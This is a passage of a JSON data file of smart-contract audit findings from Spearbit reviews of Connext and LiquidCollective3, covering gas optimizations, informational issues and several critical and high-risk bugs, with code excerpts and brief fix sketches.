+ ] + }, + { + "title": "Some gas can be saved in reimburseLiquidityFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Some gas can be saved by assigning tokenExchange before the if statement. This also improves readability. function reimburseLiquidityFees(...) ... { ... if (address(tokenExchanges[_token]) != address(0)) { // could use `tokenExchange` ITokenExchange tokenExchange = tokenExchanges[_token]; // do before the if }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "LIQUIDITY_FEE_DENOMINATOR could be a constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The value of LIQUIDITY_FEE_DENOMINATOR seems to be constant. However, it is currently stored in s and requires an SLOAD operation to retrieve it, increasing gas costs. upgrade-initializers/DiamondInit.sol: s.LIQUIDITY_FEE_DENOMINATOR = 10000; BridgeFacet.sol: toSwap = _getFastTransferAmount(..., s.LIQUIDITY_FEE_DENOMINATOR); BridgeFacet.sol: s.portalFeeDebt[_transferId] = ... / s.LIQUIDITY_FEE_DENOMINATOR; PortalFacet.sol: if (_aavePortalFeeNumerator > s.LIQUIDITY_FEE_DENOMINATOR) ... AssetLogic.sol: uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR;
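A minimal sketch of the suggestion (the placement is illustrative): declaring the value as a compile-time constant removes the SLOAD on every read:

contract BaseConnextFacetSketch {
    // read from bytecode instead of storage
    uint256 internal constant LIQUIDITY_FEE_DENOMINATOR = 10_000;
}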
", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "Access elements from storage array instead of loading them in memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The SwapUtils.removeLiquidityOneToken() function only needs the length and one element of the storage array self.pooledTokens. For this, the function reads the entire array into memory, which costs extra gas. IERC20[] memory pooledTokens = self.pooledTokens; ... uint256 numTokens = pooledTokens.length; ... pooledTokens[tokenIndex].safeTransfer(msg.sender, dy);", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "Send information through calldata instead of having callee query Executor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Callees use Executor.originSender(), Executor.origin(), and Executor.amount() to permission cross-chain calls. This costs extra gas because of staticcalls made to an external contract.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "AAVE portal debt might not be repaid in full if debt is converted to interest paying", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Aave portal mechanism gives routers access to a limited amount of unbacked debt which is to be used when fronting liquidity for cross-chain transfers. The process for receiving unbacked debt is as follows: During message execution, the protocol checks if a single liquidity provider has bid on a liquidity auction which is handled by the relayer network. If the provider has insufficient liquidity, the protocol attempts to utilize AAVE unbacked debt by minting uncollateralised aTokens and withdrawing them from the pool. The withdrawn amount is immediately used to pay out the recipient of the bridge transfer. Currently the debt carries a fixed fee, see arc-whitelist-connext-for-v3-portals; however, this might be changed in the future out of band. In case this is changed: upon repayment, AAVE will actually expect unbackedDebt + fee + aToken interest. The current implementation will only track unbackedDebt + fee; hence, the protocol will accrue bad debt in the form of interest. Eventually, the extent of this bad debt will reach a point where the unbackedMintCap has been reached and no one is able to pay off this debt. I consider this to be a long-term issue that could be handled in a future upgrade; however, it is important to highlight and address these issues early.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Routers pay the slippage cost for users when using AAVE credit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When routers front a fast-liquidity transfer, the user is paid in the adopted token, with _fastTransferAmount = _args.amount * s.LIQUIDITY_FEE_NUMERATOR / s.LIQUIDITY_FEE_DENOMINATOR. The routers get reimbursed _args.amount of local tokens afterward. Thus, the routers lose money if the slippage of swapping between local tokens and adopted tokens is larger than the liquidity fee.
function _executePortalTransfer( bytes32 _transferId, bytes32 _canonicalId, uint256 _fastTransferAmount, address _router ) internal returns (uint256, address) { // Calculate local to adopted swap output if needed address adopted = s.canonicalToAdopted[_canonicalId]; IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); // Improvement: Instead of withdrawing to address(this), withdraw directly to the user or executor to save 1 transfer uint256 amountWithdrawn = IAavePool(s.aavePool).withdraw(adopted, _fastTransferAmount, address(this)); if (amountWithdrawn < _fastTransferAmount) revert BridgeFacet__executePortalTransfer_insufficientAmountWithdrawn(); // Store principle debt s.portalDebt[_transferId] = _fastTransferAmount; // Store fee debt s.portalFeeDebt[_transferId] = (s.aavePortalFeeNumerator * _fastTransferAmount) / s.LIQUIDITY_FEE_DENOMINATOR; emit AavePortalMintUnbacked(_transferId, _router, adopted, _fastTransferAmount); return (_fastTransferAmount, adopted); }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Optimize max checks in initializeSwap()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function initializeSwap() reverts if a value is >= ...MAX.... It should probably only revert when a value is > ...MAX.... function initializeSwap(...) ... { ... // Check _a, _fee, _adminFee, _withdrawFee parameters if (_a >= AmplificationUtils.MAX_A) revert SwapAdminFacet__initializeSwap_aExceedMax(); if (_fee >= SwapUtils.MAX_SWAP_FEE) revert SwapAdminFacet__initializeSwap_feeExceedMax(); if (_adminFee >= SwapUtils.MAX_ADMIN_FEE) revert SwapAdminFacet__initializeSwap_adminFeeExceedMax(); ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "All routers share the same AAVE debt", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The mintUnbacked amount is allocated to the calling contract (e.g. the Connext Diamond that has the BRIDGE role permission). Thus it is not separated per router: if one router does not pay back its debt (in time) and has reached the max debt, then this facility cannot be used any more. function _executePortalTransfer( ... ) ... { ... IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Careful with fee on transfer tokens on AAVE loans", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Aave function backUnbacked() does not account for fee-on-transfer tokens. If such tokens happen to be used, the accounting might not be right. function _backLoan(...) ... { ... // back loan IAavePool(s.aavePool).backUnbacked(_asset, _backing, _fee); ... } library BridgeLogic { function executeBackUnbacked(... ) ... { ... reserve.unbacked -= backingAmount.toUint128(); reserve.updateInterestRates(reserveCache, asset, added, 0); IERC20(asset).safeTransferFrom(msg.sender, reserveCache.aTokenAddress, added); ...
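// Reviewer sketch (not part of the original code): with a fee-on-transfer asset the
// accounting would need to credit the amount actually received, e.g.:
// uint256 balanceBefore = IERC20(asset).balanceOf(reserveCache.aTokenAddress);
// IERC20(asset).safeTransferFrom(msg.sender, reserveCache.aTokenAddress, added);
// uint256 received = IERC20(asset).balanceOf(reserveCache.aTokenAddress) - balanceBefore;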
} }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Let getTokenPrice() also return the source of the price info", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function getTokenPrice() can get its prices information from multiple sources. For the caller it might be important to know which source was used. function getTokenPrice(address _tokenAddress) public view override returns (uint256) { }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Typos in the comments of _swapAsset() and _swapAssetOut()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "There are typos in the comments of _swapAsset() and _swapAssetOut(): * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAsset(... ) ... * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAssetOut(...) ...", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Consistently delete array entries in PromiseRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "In function process() of PromiseRouter.sol two different ways are used to clear a value: one with delete and the other with = 0. Although technically the same it better to use the same method to maintain consistency. function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // remove message delete messageHashes[transferId]; // remove callback fees callbackFees[transferId] = 0; ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "getTokenPrice() will revert if setDirectPrice() is set in the future", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The setDirectPrice() function allows the protocol admin to update the price up to two seconds in the future. This impacts the getTokenPrice() function as the updated value may be slightly incorrect.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Roundup in words not optimal", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function words, which is used in the Nomad code base, tries to do a round up. Currently it adds 1 to the len. /** * @notice * @param memView * @return */ The number of memory words this memory view occupies, rounded up. The view uint256 - The number of memory words function words(bytes29 memView) internal pure returns (uint256) { return uint256(len(memView)).add(32) / 32; }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "callback could have capped returnData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function execute() caps the result of the call to excessivelySafeCall to a maximum of MAX_- COPY bytes, making sure the result is small enough to fit in a message sent back to the originator. However, when the callback is done the originator needs to be aware that the data can be capped and this fact is not clearly documented. 41 function execute(...) ... { ... 
(success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); } function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // execute callback ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData()); // returnData is capped ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Several external functions are not nonReentrant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The following functions don't have nonReentrant, while most other external functions do have this modifier. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet. repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. initiateClaim of RelayerFacet. There are many swaps in the protocol and some of them should be conducted in an aggregator (not yet implemented). A lot of aggregators use the difference between the pre-swap balance and the post-swap balance (e.g. Uniswap V3 router, 1inch, etc.). While this isn't exploitable yet, there is a chance that future updates might open up an issue to exploit.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "NomadFacet.reconcile() has an unused argument canonicalDomain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "NomadFacet.reconcile() has an unused argument canonicalDomain.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "SwapUtils._calculateSwap() returns two values with different precision", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "SwapUtils._calculateSwap() returns (uint256 dy, uint256 dyFee). dy is the amount of tokens a user will get from a swap and dyFee is the associated fee. To account for the different token decimal precision between the two tokens being swapped, a multipliers mapping is used to bring the precision to the same value. To return the final values, dy is changed back to the original token precision but dyFee is not. This is an internal function and the callers adjust the fee precision back to normal, therefore the severity is informational. But without documentation it is easy to miss.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Multicall.sol not compatible with Natspec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Multicall.sol's Natspec comment specifies: /// @title Multicall - Aggregate results from multiple read-only function calls However, to call those functions it uses the low-level call() method, which can call write functions as well. (bool success, bytes memory ret) = calls[i].target.call(calls[i].callData);", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "reimburseRelayerFees only what is necessary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function reimburseRelayerFees() gives a maximum of relayerFeeCap to a receiver, unless it already has a balance of relayerFeeCap. This implicitly means that a balance of relayerFeeCap is sufficient. So if a receiver already has a balance, only relayerFeeCap - _to.balance is required. This way more recipients can be reimbursed with the same amount of funds in the SponsorVault. function reimburseRelayerFees(...) ... { ... if (_to.balance > relayerFeeCap || Address.isContract(_to)) { // Already has fees, and the address is a contract return; } ... sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; ... }
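A minimal sketch of the suggested top-up logic (the helper name and parameters are illustrative, not the project's API): only sponsor the difference up to the cap:

function _cappedSponsorship(uint256 sponsoredFee, uint256 relayerFeeCap, address to) internal view returns (uint256) {
    if (to.balance >= relayerFeeCap) return 0;    // receiver is already at the cap
    uint256 missing = relayerFeeCap - to.balance; // only the difference is needed
    return sponsoredFee > missing ? missing : sponsoredFee;
}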
", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "safeIncreaseAllowance and safeDecreaseAllowance can be replaced with safeApprove in _reconcileProcessPortal", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The NomadFacet uses safeIncreaseAllowance after clearing the allowance, and safeDecreaseAllowance to clear the allowance. Using safeApprove is potentially safer in this case. Some non-standard tokens only allow the allowance to change from zero, or change to zero. Using safeDecreaseAllowance would potentially break the contract in a future update. Note that safeApprove has been deprecated over the concern of a front-running attack. It is only supported when setting an initial allowance or setting the allowance to zero: SafeERC20.sol#L38", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Event not emitted when ERC20 and native asset is transferred together to SponsorVault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Any ERC20 token or native asset can be transferred to the SponsorVault contract by calling the deposit() function. It emits a Deposit() event logging the transferred asset and the amount. However, if the native asset and an ERC20 token are transferred in the same call, only a single event corresponding to the ERC20 transfer is emitted.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "payable keyword can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "If a function does not need to have the native asset sent to it, it is recommended to not mark it as payable, to avoid any funds getting stuck. StableSwapFacet.sol has two payable functions: swapExact() and swapExactOut(), which only swap ERC20 tokens and are not expected to receive the native asset.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Improve variable naming", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Two different variables/functions with an almost identical name are prone to error. Variable names like _routerOwnershipRenounced and _assetOwnershipRenounced do not correctly reflect their meaning, as they actually refer to the ownership whitelist being renounced. function _isRouterOwnershipRenounced() internal view returns (bool) { return LibDiamond.contractOwner() == address(0) || s._routerOwnershipRenounced; } /** * @notice Indicates if the ownership of the asset whitelist has * been renounced */ function _isAssetOwnershipRenounced() internal view returns (bool) { ... bool _routerOwnershipRenounced; ... // 27 bool _assetOwnershipRenounced; The constant EMPTY is defined twice with different values. This is confusing and could lead to errors. contract BaseConnextFacet { ...
bytes32 internal constant EMPTY = hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\"; ... } library LibCrossDomainProperty { ... bytes29 public constant EMPTY = hex\"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"; ... } The function xcall() uses both _args.transactingAssetId and transactingAssetId. It is easy to mix these two, but they each have a very specific meaning, and missing this introduces problems. function xcall(...) ... { ... address transactingAssetId = _args.transactingAssetId == address(0) ? address(s.wrapper) : _args.transactingAssetId; ... (, uint256 amount) = AssetLogic.handleIncomingAsset( _args.transactingAssetId, ... ); ... (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( ..., transactingAssetId, ... ); ... } In the _handleExecuteTransaction function of BridgeFacet, _args.amount and _amount are used. In this function: _args.amount is equal to bridged_amount; _amount is equal to bridged_amount - liquidityFee (and potentially the swapped amount).", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "onlyRemoteRouter can be circumvented", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "A fix has been applied in BaseConnextFacet (BaseConnextFacet-fix). However, the change has not been applied to Router.sol#L56-L58, which is currently in use. The modifier onlyRemoteRouter() can be misled if the sender parameter has the value 0. The modifier uses _m.sender() from the message received via Nomad. Assuming all checks of Nomad work as expected, this value cannot be 0, as it originates from a msg.sender in Home.sol. contract Replica is Version0, NomadBase { function process(bytes memory _message) public returns (bool _success) { ... bytes29 _m = _message.ref(0); ... // ensure message has been proven bytes32 _messageHash = _m.keccak(); require(acceptableRoot(messages[_messageHash]), \"!proven\"); ... IMessageRecipient(_m.recipientAddress()).handle( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ); ... } } contract BridgeRouter is Version0, Router { function handle(uint32 _origin,uint32 _nonce,bytes32 _sender,bytes memory _message) external override onlyReplica onlyRemoteRouter(_origin, _sender) { ... } } abstract contract Router is XAppConnectionClient, IMessageRecipient { ... modifier onlyRemoteRouter(uint32 _origin, bytes32 _router) { require(_isRemoteRouter(_origin, _router), \"!remote router\"); _; } function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return remotes[_domain] == _router; // if _router == 0 then this is true for random _domains } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Some dust not accounted for in reconcile()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _handleExecuteLiquidity() in BridgeFacet takes care of rounding issues in toSwap / pathLen. However, the inverse function reconcile() in NomadFacet does not do that. So, tiny amounts of tokens (dust) are not accounted for in reconcile(). contract BridgeFacet is BaseConnextFacet { ... function _handleExecuteLiquidity(...) ... { ... // For each router, assert they are approved, and deduct liquidity.
uint256 routerAmount = toSwap / pathLen; for (uint256 i; i < pathLen - 1; ) { s.routerBalances[_args.routers[i]][_args.local] -= routerAmount; unchecked { ++i; } } // The last router in the multipath will sweep the remaining balance to account for remainder dust. uint256 toSweep = routerAmount + (toSwap % pathLen); s.routerBalances[_args.routers[pathLen - 1]][_args.local] -= toSweep; } } } contract NomadFacet is BaseConnextFacet { ... function reconcile(...) ... { ... uint256 routerAmt = toDistribute / pathLen; for (uint256 i; i < pathLen; ) { s.routerBalances[routers[i]][localToken] += routerAmt; unchecked { ++i; } } } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Careful with the decimals of BridgeTokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The BridgeRouter sends token details, including decimals(), over the Nomad bridge to configure a newly deployed token. After setting the hash with setDetailsHash(), anyone can call setDetails() on the token to set the details. The decimals() are mainly used for user interfaces, so it might not be a large problem if setDetails() is executed at a later point in time. However, initializeSwap() also uses decimals(), and it is called via off-chain code. The example code in initializeSwap.ts retrieves decimals() from the deployed token on the destination chain. This introduces a race condition between setDetails() and initializeSwap.ts: depending on which is executed first, the swaps will have different results. Note: it could also break the ConnextPriceOracle. contract BridgeRouter is Version0, Router { ... function _send( ... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... // query token contract for details and calculate detailsHash _detailsHash = BridgeMessage.getDetailsHash(_t.name(), _t.symbol(), _t.decimals()); } else { ... } } function _handleTransfer(...) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... } else { ... IBridgeToken(_token).setDetailsHash(_action.detailsHash()); // so hash is set now } } } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function setDetails(..., uint8 _newDecimals) ... { // can be called by anyone ... require( _isFirstDetails || BridgeMessage.getDetailsHash(..., _newDecimals) == detailsHash, \"!committed details\" ); ... token.decimals = _newDecimals; ... } } Example script: initializeSwap.ts const decimals = await Promise.all([ (await ethers.getContractAt(\"TestERC20\", local)).decimals(), (await ethers.getContractAt(\"TestERC20\", adopted)).decimals(), // setDetails might not have been done ]); const tx = await connext.initializeSwap(..., decimals, ... ); contract SwapAdminFacet is BaseConnextFacet { ... function initializeSwap(..., uint8[] memory decimals, ... ) ... { ... for (uint8 i; i < numPooledTokens; ) { ... precisionMultipliers[i] = 10**uint256(SwapUtils.POOL_PRECISION_DECIMALS - decimals[i]); ...
} } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Incorrect comment about ERC20 approval to zero-address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The linked code notes in a comment: // NOTE: if pool is not registered here, then the approval will fail // as it will approve to the zero-address SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); This is not always true. The ERC20 spec doesnt have this restriction and ERC20 tokens based on solmate also dont revert on approving to zero-address. There is no risk here as the following line of code for zero-address pools will revert. return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut);", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Native asset is delivered even if the wrapped asset is transferred", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Connext delivers the native asset on the destination chain even if the wrapped asset was transferred. This is because on the source chain the native asset is converted to the wrapped asset, and then the distinction is lost. On the destination chain it is not possible to know which of these two assets was transferred, and hence a choice is made to transfer the native asset. if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ...", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Entire transfer amount is borrowed from AAVE Portal when a router has insufficient balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "If the router picked by the Sequencer doesnt have enough balance to transfer the required amount, it can borrow the entire amount from Aave Portal. For a huge amount, it will block borrowing for other routers since there is a limit on the total maximum amount that can be borrowed.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Unused variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The variable message is not used after declaration. bytes memory message;", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Incorrect Natspec for adopted and canonical asset mappings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "adoptedToCanonical maps adopted assets to canonical assets, but is described as a \"Mapping of canonical to adopted assets\"; canonicalToAdopted maps canonical assets to adopted assets, but is described as a \"Mapping of adopted to canonical assets\". 
", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Use of SafeMath for solc >= 0.8", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "AmplificationUtils, SwapUtils, ConnextPriceOracle and GovernanceRouter.sol use SafeMath. Since 0.8.0, arithmetic in Solidity reverts if it overflows or underflows, hence there is no need to use OpenZeppelin's SafeMath library.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "_pickNextValidatorsToExitFromActiveOperators uses the wrong index to query stopped validator count for operators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "operators does not necessarily have the same order as the actual OperatorsV2 operators, since the ones that don't have _hasExitableKeys will be skipped (the operator might not be active, or all of its funded keys might have been requested to exit). And so when querying the stopped validator counts for (uint256 idx = 0; idx < exitableOperatorCount;) { uint32 currentRequestedExits = operators[idx].requestedExits; uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, idx); one should not use the idx into the cached operators array, but the cached index of this array element, as the indexes of stoppedValidators correspond to the operators array actually stored in storage. Note that when emitting the UpdatedRequestedValidatorExitsUponStopped event, the correct index has been used.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Critical Risk" + ] + }, + { + "title": "Oracles' reports votes are not stored in storage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The purpose of Oracle.1.sol is to facilitate the reporting and quorum of oracles. Oracles periodically add their reports, and when consensus is reached the setConsensusLayerData function (which is a critical component of the system) is called. However, there is an issue with the current implementation: ReportVariants holds the reports made by oracles, but ReportVariants.get() returns a memory array instead of a storage array, so the increase in votes will not be stored at the end of the transaction, preventing setConsensusLayerData from being called. This is a regression bug that should have been detected by a comprehensive test suite.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Critical Risk" + ] + }, + { + "title": "User's LsETH might be locked due to out-of-gas error during recursive calls", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Let W0, W1, ...W7 represent the withdrawal events in the withdrawal stack. Let R0, R1, R2 represent the users' redeem requests in the redeem queue.
Assume that Alice is the owner of R1. When Alice calls the resolveRedeemRequests function against R1, it will resolve to W1. Next, Alice calls the _claimRedeemRequest function with R1 and its corresponding W1. _claimRedeemRequest will first process W1. At the end of the function, it checks whether W1 covers the full amount of R1. If not, it calls _claimRedeemRequest recursively with the same request id (R1) but an incremented withdrawal event id (W2 = W1 + 1). The _claimRedeemRequest function recursively calls itself until the whole amount of the redeem request is \"expended\" or the next withdrawal event does not exist. In the above example, _claimRedeemRequest will be called 7 times with W1...W7, until all the amount of R1 is \"expended\" (R1.amount == 0). However, if the amount of a redeem request is large (e.g. 1000 LsETH), and this redeem request is satisfied by many small chunks of withdrawal events (e.g. one withdrawal event consists of less than 10 LsETH), then the recursion depth will be large. The function will keep calling itself recursively until an out-of-gas error happens. If this happens, there is no way to claim the redemption request, and the user's LsETH will be locked. In the current implementation, users cannot break the claim into smaller chunks to overcome the gas limit. In the above example, if Alice attempts to break the claim into smaller chunks by first calling the _claimRedeemRequest function with R1 and its corresponding W5, the _isMatch function within it will revert.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: High Risk" + ] + }, + { + "title": "Allowed users can directly transfer their share to RedeemManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "An allowed user can directly transfer their shares to the RedeemManager without requesting a redeem. This would cause the withdrawal stack to grow, since the redeem demand, which is calculated based on the RedeemManager's share of LsETH, increases. The RedeemQueue would be untouched in this case. In case of an accidental mistake by a user, the locked shares can only be retrieved by a protocol update.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Medium Risk" + ] + }, + { + "title": "Invariants are not enforced for stopped validator counts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "_setStoppedValidatorCounts does not enforce the following invariants: stoppedValidatorCounts[0] <= DepositedValidatorCount.get() stoppedValidatorCounts[i] needs to be a non-decreasing function when viewed on a timeline stoppedValidatorCounts[i] needs to be less than or equal to the funded number of validators for the corresponding operator. Currently, the oracle members can report values that would break these invariants. As a consequence, the oracle members can signal the operators to exit more or fewer validators by manipulating the preExitingBalance value. The activeCount used by the exiting-validators picking algorithm can also be manipulated per operator.
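A minimal sketch of the missing checks (error names and parameters are illustrative, following the codebase's style; a per-operator bound against the funded key count would be enforced similarly):

error InvalidStoppedTotal();
error DecreasingStoppedCount();

function _checkStoppedValidatorCounts(uint32[] calldata counts, uint32[] storage previous, uint256 depositedCount) internal view {
    // the total stopped count can never exceed the number of deposited validators
    if (counts.length > 0 && counts[0] > depositedCount) revert InvalidStoppedTotal();
    for (uint256 i = 0; i < counts.length;) {
        // each entry must be non-decreasing over time
        if (i < previous.length && counts[i] < previous[i]) revert DecreasingStoppedCount();
        unchecked { ++i; }
    }
}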
", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Medium Risk" + ] + }, + { + "title": "Potential out of gas exceptions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The purpose of _requestExitsBasedOnRedeemDemandAfterRebalancings is to release liquidity for withdrawals made in the RedeemManager contract. The function prioritizes liquidity sources, starting with BalanceToRedeem and then BalanceToDeposit, before asking validators to exit. However, if validators are needed to release more liquidity, the function uses pickNextValidatorsToExit to determine which validators to ask to exit. This process can be quite gas-intensive, especially if the number of validators is large. The gas consumption of this function depends on several factors, including exitableOperatorCount, stoppedValidators.length, and the rate of decrease of _count. These factors may increase over time, and the msg.sender does not have control over them. The function includes two nested loops that contribute to the overall gas consumption, and this can be problematic for certain inputs. For example, if the operators array has no duplications and the difference between values is exactly 1, such as [n, n-1, n-2 ... 